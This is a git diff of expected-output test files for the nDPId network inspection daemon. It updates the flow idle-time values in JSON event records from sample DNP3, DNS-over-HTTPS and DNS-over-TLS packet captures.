+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1097513177295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097513177295,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAUpAAIAG5XIKAAAJCgAAAwQ8TiBc3qwfAAAAAHAC\/\/8TugAAAgQFtAEBBAI="} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097513177295,"flow_last_seen":1097513177297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097513177297,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097513177295,"flow_last_seen":1097513185107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1084,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1097510947092,"flow_last_seen":1097510959487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1097512255234,"flow_last_seen":1097512267645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1097513185107,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":543,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":543,"packets-processed":543,"total-skipped-flows":0,"total-l4-data-len":7788,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1097513185107} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 543/543 diff --git a/test/results/dns_doh.pcap.out b/test/results/dns_doh.pcap.out index eb83844bf..34100eb85 100644 --- a/test/results/dns_doh.pcap.out +++ b/test/results/dns_doh.pcap.out @@ -1,12 +1,12 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns_doh.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1571089200789} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1571089200789,"flow_last_seen":1571089200789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1571089200789,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1571089200789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1571089200789,"pkt":"WkBO7NFkeDHBvV4kCABFAABAAABAAEAGI5asFAoEaBD4+cLVAbuk7FgiAAAAALAC\/\/+OlwAAAgQFtAEDAwYBAQgKHZWyDQAAAAAEAgAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1571089200876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1571089200876,"pkt":"eDHBvV4kWkBO7NFkCABFAAA0AAAAADAGc6JoEPj5rBQKBAG7wtXKYdwupOxYI4ASchB+OgAAAgQFFAEBBAIBAwMK"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1571089200876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1571089200876,"pkt":"WkBO7NFkeDHBvV4kCABFAAAoAABAAEAGI66sFAoEaBD4+cLVAbuk7FgjymHcL1AQEAAggAAA"} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1571089200789,"flow_last_seen":1571089200878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1571089200878,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1571089200789,"flow_last_seen":1571089200968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1571089200968,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1571089200789,"flow_last_seen":1571089204031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":12658,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1571089204031,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1571089200789,"flow_last_seen":1571089200789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1571089200789,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1571089200789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1571089200789,"pkt":"WkBO7NFkeDHBvV4kCABFAABAAABAAEAGI5asFAoEaBD4+cLVAbuk7FgiAAAAALAC\/\/+OlwAAAgQFtAEDAwYBAQgKHZWyDQAAAAAEAgAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1571089200876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1571089200876,"pkt":"eDHBvV4kWkBO7NFkCABFAAA0AAAAADAGc6JoEPj5rBQKBAG7wtXKYdwupOxYI4ASchB+OgAAAgQFFAEBBAIBAwMK"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1571089200876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1571089200876,"pkt":"WkBO7NFkeDHBvV4kCABFAAAoAABAAEAGI66sFAoEaBD4+cLVAbuk7FgjymHcL1AQEAAggAAA"} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1571089200789,"flow_last_seen":1571089200878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1571089200878,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1571089200789,"flow_last_seen":1571089200968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1571089200968,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":142,"flow_first_seen":1571089200789,"flow_last_seen":1571089204031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":12658,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1571089204031,"l3_proto":"ip4","src_ip":"172.20.10.4","dst_ip":"104.16.248.249","src_port":49877,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":142,"source":"dns_doh.pcap","alias":"nDPId-test","packets-captured":142,"packets-processed":142,"total-skipped-flows":0,"total-l4-data-len":12658,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1571089204031} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 142/142 diff --git a/test/results/dns_dot.pcap.out b/test/results/dns_dot.pcap.out index 9a6f29bfc..c158f294b 100644 --- a/test/results/dns_dot.pcap.out +++ b/test/results/dns_dot.pcap.out @@ -1,12 +1,12 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dns_dot.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1572783663234} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1572783663234,"flow_last_seen":1572783663234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1572783663234,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572783663234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663234,"pkt":"uCfrK5DxCAAnjau+CABFAAA8w6dAAEAGpKPAqAG5CAgICOOyA1VVRPv3AAAAAKAC+vDSnwAAAgQFtAQCCAoqL5UTAAAAAAEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663269,"pkt":"CAAnjau+uCfrK5DxCABFAAA8cqUAAHcG\/qUICAgIwKgBuQNV47LuO0vYVUT7+KAS6yDKxQAAAgQFZAQCCAqOOwAQKi+VEwEDAwg="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572783663269,"pkt":"uCfrK5DxCAAnjau+CABFAAA0w6hAAEAGpKrAqAG5CAgICOOyA1VVRPv47jtL2YAQAfbSlwAAAQEICiovlTaOOwAQ"} -01181{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572783663234,"flow_last_seen":1572783663269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1572783663269,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1572783663234,"flow_last_seen":1572783663319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":3267,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1572783663319,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"2b341b88c742e940cfb485ce7d93dde7","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"BE:73:46:2A:2E:FB:A9:E9:42:D0:71:10:1B:8C:BF:44:6A:5D:AD:53"}} -01056{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1572783663234,"flow_last_seen":1572783666246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3069,"flow_tot_l4_payload_len":4269,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1572783666246,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1572783663234,"flow_last_seen":1572783663234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1572783663234,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572783663234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663234,"pkt":"uCfrK5DxCAAnjau+CABFAAA8w6dAAEAGpKPAqAG5CAgICOOyA1VVRPv3AAAAAKAC+vDSnwAAAgQFtAQCCAoqL5UTAAAAAAEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572783663269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1572783663269,"pkt":"CAAnjau+uCfrK5DxCABFAAA8cqUAAHcG\/qUICAgIwKgBuQNV47LuO0vYVUT7+KAS6yDKxQAAAgQFZAQCCAqOOwAQKi+VEwEDAwg="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572783663269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1572783663269,"pkt":"uCfrK5DxCAAnjau+CABFAAA0w6hAAEAGpKrAqAG5CAgICOOyA1VVRPv47jtL2YAQAfbSlwAAAQEICiovlTaOOwAQ"} +01181{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_dot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572783663234,"flow_last_seen":1572783663269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1572783663269,"l3_proto":"ip4","src_ip":"192.168.1.185","dst_ip":"8.8.8.8","src_port":58290,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"4fa5e77b91a47e7cdcf5a5e6d25f8449","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 